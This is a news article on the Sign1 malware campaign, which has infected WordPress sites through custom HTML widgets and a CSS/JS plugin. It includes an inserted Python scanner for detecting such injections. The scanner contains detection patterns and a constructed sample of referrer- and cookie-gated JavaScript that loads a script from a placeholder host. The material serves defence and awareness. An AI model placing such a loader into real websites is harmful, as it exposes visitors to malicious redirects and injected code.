Rise of the Sign1 Malware: Over 39K WordPress Sites Compromised

A stealthy malware operation known as Sign1 has come to light, having compromised upwards of 39,000 websites powered by WordPress in the past half year. This alarming breach has led to unwelcome redirects and pop-up advertisements plaguing site visitors. Learn more about it below:

Unveiling the Sign1 Malware

Discovered by the team at Sucuri, the Sign1 malware has emerged as a significant threat. The attackers embed the malicious code within custom HTML widgets and legitimate plugins rather than tampering with core WordPress files, which leaves the usual integrity checks clean and makes detection harder.

The initial discovery stemmed from a routine investigation by Sucuri for a client whose site began sporadically bombarding visitors with pop-up ads, a hallmark of the Sign1 malware’s presence.

Infiltration Techniques and Evasion Tactics

The breach of Sucuri’s client was attributed to a brute-force attack. While specific details regarding the compromise of other sites remain undisclosed, it is speculated that the attackers employed a blend of brute-force attacks and exploitation of plugin vulnerabilities to infiltrate WordPress sites.

Once inside, the attackers prefer WordPress’s custom HTML widgets or, in many cases, the legitimate Simple Custom CSS and JS plugin as the place to inject their malicious JavaScript.

Sign1 is notably sophisticated in its evasion tactics; it employs time-based randomization to dynamically alter URLs every 10 minutes, circumventing conventional blocking efforts. The fleeting nature of these domains, registered just prior to their use in attacks, ensures they remain off blocklists.

Initially hosted on Namecheap, the attackers have since shifted their operations to HETZNER for web hosting, with Cloudflare providing an additional layer of anonymity via IP address obfuscation. The intricacies of the injected code, featuring XOR encoding and arbitrary variable names, pose significant challenges for security tools attempting detection.

Domains and number of Sign1 malware infections (Source: Sucuri)

A key aspect of the malware’s execution strategy involves targeting specific visitors, identified through referrers and cookies, who arrive from major platforms such as Google and Facebook, while remaining dormant for everyone else. The malware also sets a cookie in the visitor’s browser so that the disruptive pop-up appears only once, which minimizes the risk of detection.

Victims are often redirected to deceitful sites, including bogus captchas designed to dupe individuals into enabling browser notifications, which subsequently serve as conduits for intrusive advertisements.
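As an added illustration (not code from Sucuri or from this article), here is a heuristic scanner a site owner could run over the stored contents of custom HTML widgets and Simple Custom CSS and JS snippets to surface injections that behave as described above. The indicator patterns, the threshold, and the two sample widgets are my own assumptions modelled on that description, not on the real Sign1 code.

```python
import re

# Heuristic indicators: my own assumptions modelled on the behaviour the article
# attributes to Sign1, not patterns taken from the real injected code.
INDICATORS = {
    "xor_decoded_string": re.compile(r"fromCharCode\([^)]*\^|charCodeAt\([^)]*\)\s*\^"),
    "referrer_gate": re.compile(r"document\.referrer"),
    "social_referrer_match": re.compile(r"google|facebook", re.I),
    "cookie_gate": re.compile(r"document\.cookie"),
    "time_bucketed_url": re.compile(r"(Date\.now\(\)|getTime\(\))\s*/\s*\d+"),
    "dynamic_script_tag": re.compile(r"""createElement\(\s*['"]script['"]\s*\)"""),
}
THRESHOLD = 3  # indicators needed before a snippet is reported

# Constructed fixtures standing in for rows pulled from wp_options (widget_custom_html)
# or from the Simple Custom CSS and JS plugin; placeholder.invalid is a placeholder host.
SAMPLE_WIDGETS = {
    "cookie-consent": "<script>document.cookie='consent=1;path=/';</script>",
    "custom-html-3": """<script>
var _0x1=Math.floor(Date.now()/600000);
if(/google|facebook/i.test(document.referrer)&&document.cookie.indexOf('s1')<0){
 var h=String.fromCharCode(104^3,116^1);var s=document.createElement('script');
 s.src='https://placeholder.invalid/'+_0x1+'.js';document.head.appendChild(s);
 document.cookie='s1=1';}
</script>""",
}

def extract_scripts(html):
    """Return the bodies of inline <script> blocks in a widget or plugin snippet."""
    return re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I)

def scan_snippet(html):
    """Return the names of the indicators found in the snippet's inline scripts."""
    hits = []
    for body in extract_scripts(html):
        for name, rx in INDICATORS.items():
            if name not in hits and rx.search(body):
                hits.append(name)
    # A platform name alone is harmless; it only counts alongside a referrer check.
    if "social_referrer_match" in hits and "referrer_gate" not in hits:
        hits.remove("social_referrer_match")
    return hits

def flag_widgets(widgets):
    """Map widget id -> indicator list for every snippet at or above THRESHOLD."""
    scanned = {wid: scan_snippet(text) for wid, text in widgets.items()}
    return {wid: hits for wid, hits in scanned.items() if len(hits) >= THRESHOLD}

if __name__ == "__main__":
    for wid, hits in flag_widgets(SAMPLE_WIDGETS).items():
        print(f"{wid}: {len(hits)} indicators -> {', '.join(hits)}")
```

Because the injected code rotates URLs and variable names, the scanner keys on behaviour (referrer and cookie gating, time-bucketed URLs, XOR string decoding) rather than on any fixed domain or identifier.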

Evolving Threat Landscape

Sucuri’s insights reveal a concerning evolution of the Sign1 malware, with its stealth and resilience against blocks intensifying. The past six months have witnessed a dramatic surge in infections, particularly with the release of new malware iterations.

The recent spike in attacks, initiating in January 2024, underscores the escalating sophistication and adaptability of the Sign1 campaign. Such developments signal an urgent need for heightened vigilance and robust protective measures among website administrators.

Final Word

Website administrators are advised to fortify their defenses with robust passwords and ensure plugins are promptly updated to their latest versions. Additionally, removing unnecessary add-ons can significantly reduce the attack surface, fortifying your site against such insidious threats.

Author: Anas Hasan

Date: March 22, 2024

Anas Hassan is a tech geek and cybersecurity enthusiast. He has vast experience in the digital transformation industry. When Anas isn’t blogging, he watches football games.
